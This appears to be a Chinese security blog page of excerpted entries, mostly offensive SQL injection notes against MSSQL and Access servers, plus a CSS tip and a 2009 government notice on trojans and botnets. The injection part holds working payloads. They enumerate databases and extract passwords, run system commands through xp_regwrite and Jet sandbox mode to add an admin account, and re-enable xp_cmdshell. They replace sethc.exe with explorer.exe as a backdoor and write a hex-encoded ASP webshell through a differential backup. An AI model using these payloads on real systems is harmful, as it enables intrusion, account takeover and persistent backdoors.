用DW CS4出web120.org的页面。最后检测兼容性时提示

如果无法将内容放入固定宽度或固定高度的框中，则框会扩展以适应内容，而不是让内容溢出框外。

Internet Explorer 6.0

解决方法：加上 overflow:hidden;即可

1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符’and [查询条件] and ’’=’

4.搜索时没过滤参数的’and [查询条件] and ’%’=’

5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字段 ;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值（access）

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值（mssql）

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构（mssql）

;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));-- Read the rest of this entry

SA权限仅需xp_regwrite即可有dos shell

删除xp_cmdshell和xplog70.dll不用担心，只要保留xp_regwrite就可以执行系统命令，拥有一个dos shell

利用RDS的一个老问题，在IIS 4.0的时候被广泛利用，现在好像没多少人想得起来了

绝对比去想办法恢复xp_cmdshell来得经济实惠，不过需要猜一下系统路径

nt/2k: x:\winnt\system32\

xp/2003: x:\windows\system32\

如果有回显，可以看到执行返回结果，否则需要先判断主机OS类型再试

当然如果野蛮一点，四个轮流来一遍也行。

首先开启沙盘模式：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE''SOFTWARE\Microsoft\Jet\4.0\Engines''SandBoxMode''REG_DWORD'1

然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0'';database=c:\winnt\system32\ias\ias.mdb''select shell("cmd.exe /c net user admin admin1234 /add")')

--------------------------------------------------------------------------------------------------------------------------

db_owner到sysadmin的测试

sql injection终极利用方法》一文影响蛮大的，在叮当群上我们一帮人也讨论并测试了文章里的一点东西，这里把我们测试结果发一下：

在2个前提条件下，文章里的方法是可以实现的

① 连接的dbo用户必须对master有权限

② SQL必须设置为“允许对系统目录直接进行修改”（SQL Server属性--服务器设置）

这2个条件都是比较苛刻的，尤其是第2条，使的文章里提到的方法的成功率应该不是很高。

如果没有第1条，那么当我们执行drop procedure sp_addlogin操作时就会提示

服务器: 消息 3704，级别 16，状态 1，行 1

用户没有在 过程 'sp_addlogin' 上执行该操作的权限。

没有第2条，我们恢复sp_addlogin事 会提示错误

服务器: 消息 259，级别 16，状态 2，过程 sp_addlogin，行 115

未启用对系统目录的特殊更新。系统管理员必须重新配置 SQL Server 以允许这种操作。

顺便对文章里提到的xp_regwrite进行下测试，测试结果也是要求“连接的dbo用户必须对master有权限”

不过在使用 xp_regread时 并不要要求对master的权限

如果你感兴趣，也可以对其他的“扩展过程”进行这样的测试

虽然文章里面的直接成功率小，但是可以做为 “后门”。

--------------------------------------------------------------------------------------------------------------------------- Read the rest of this entry

测试环境：windows xp pro sp2 + mssql 2005（服务以system权限启动）

一．xp_cmdshell

EXEC master..xp_cmdshell ‘ipconfig’

开启xp_cmdshell:

– To allow advanced options to be changed.

EXEC sp_configure ’show advanced options’, 1

GO

– To update the currently configured value for advanced options.

RECONFIGURE

GO

– To enable the feature.

EXEC sp_configure ‘xp_cmdshell’, 1

GO

– To update the currently configured value for this feature.

RECONFIGURE

GO

二．sp_oacreate

创建wscript.shell对象

use master declare @o int exec sp_oacreate ‘wscript.shell’,@o out exec sp_oamethod @o,‘run’,null,‘cmd /c "net user" > c:\test.tmp’

创建scripting.filesystemobject对象

declare @o int

exec sp_oacreate ’scripting.filesystemobject’, @o out

exec sp_oamethod @o, ‘copyfile’,null,‘c:\windows\explorer.exe’ ,‘c:\windows\system32\sethc.exe’; Read the rest of this entry

减少备份文件大小，得到可执行的webshell成功率提高不少

一利用差异备份

加一个参数WITH DIFFERENTIAL

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s

create table [dbo].[xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

二利用完全FORMAT

加一个参数WITH FROMAT

有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s Read the rest of this entry

Sql Injection永远是那么可爱...

Sql注射总结（早源于'or'1'='1）
最重要的表名：
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
最重要的一些用户名（默认sql数据库中存在着的）
public
dbo
guest(一般禁止，或者没权限)
db_sercurityadmin
ab_dlladmin
---------------------------------
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')-
union select TOP 1 login_name FROM logintable-
union select TOP 1 password FROM logintable where login_name='Rahul'--
构造语句：查询是否存在xp_cmdshell
and 1=(select @@VERSION)
and 'sa'=(select System_user)
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select IS_SRVROLEMEMBER('sysadmin')) 判断sa权限是否
and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名（从1到5都是系统的id，6以上才可以判断）
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表 假设为 admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
('id',...)) 来暴出其他的字段 Read the rest of this entry

工信部近日下发关于印发《木马和僵尸网络监测与处置机制》的通知.
通知指出,对于特别重大、重大、较大事件的处置情况,国家计算机网络应急技术处理协调中心(以下简称CNCERT)应在接到处置单位反馈后2小时内向通信保障局和相关通信管理局反馈处置结果.对于涉嫌犯罪的木马和僵尸网络事件,应报请公安机关依法调查处理.

《木马和僵尸网络监测与处置机制》自2009年6月1日起实施.

工信部称,制定此办法的主要目的是防范和处置木马和僵尸网络引发的网络安全隐患,净化公共互联网环境.

以下为通知全文：

工信部保[2009]157号

各省、自治区、直辖市通信管理局、国家计算机网络应急技术处理协调中心、中国互联网络信息中心、政府和公益机构域名注册管理中心、部电信研究院、中国互联网协会、中国电信集团公司、中国移动通信集团公司、中国联合网络通信集团有限公司、其他相关单位：

为防范和处置木马和僵尸网络引发的网络安全隐患，净化公共互联网环境，维护我国公共互联网安全，制定《木马和僵尸网络监测与处置机制》，现印发给你们，请遵照执行。

联系人：付景广 010－66022774

二〇〇九年四月十三日

木马和僵尸网络监测与处置机制

第一条 为有效防范和处置木马和僵尸网络引发的网络安全隐患，规范监测和处置行为，净化网络环境，维护我国公共互联网安全，依据《中华人民共和国电信条例》、《互联网网络安全应急预案》，制定本办法。

第二条 木马是指由攻击者安装在受害者计算机上秘密运行并用于窃取信息及远程控制的程序。僵尸网络是指由攻击者通过控制服务器控制的受害计算机群。木马和僵尸网络对网络信息安全造成危害和威胁，是造成个人隐私泄露、失泄密、垃圾邮件和大规模拒绝服务攻击的重要原因。

第三条 本办法适用于对危害公共互联网安全的木马和僵尸网络控制端（以下简称木马和僵尸网络）及其使用的IP地址和恶意域名的监测和处置。

第四条 工业和信息化部指导、组织、监督全国木马和僵尸网络的监测和处置工作。工业和信息化部通信保障局（以下简称通信保障局）负责具体工作。

各省、自治区、直辖市通信管理局（以下简称通信管理局）指导、组织、监督本行政区域内木马和僵尸网络的监测和处置工作。

国家计算机网络应急技术处理协调中心（以下简称CNCERT）受通信保障局委托，负责对木马和僵尸网络的规模、类型、活跃程度、危害等情况进行监测、汇总、分析、核实，组织开展通报工作，协调处置木马和僵尸网络IP地址和恶意域名。

基础电信运营企业负责对本单位网内木马和僵尸网络进行监测、核实，对CNCERT汇总通报的涉及本单位的木马和僵尸网络进行处置和反馈。

互联网域名注册管理机构负责对CNCERT通报的由自身管理的恶意域名进行处置。对于由国内互联网域名注册服务机构注册的由境外域名注册管理机构管理的域名，由CNCERT直接协调国内互联网域名注册服务机构进行处置。 Read the rest of this entry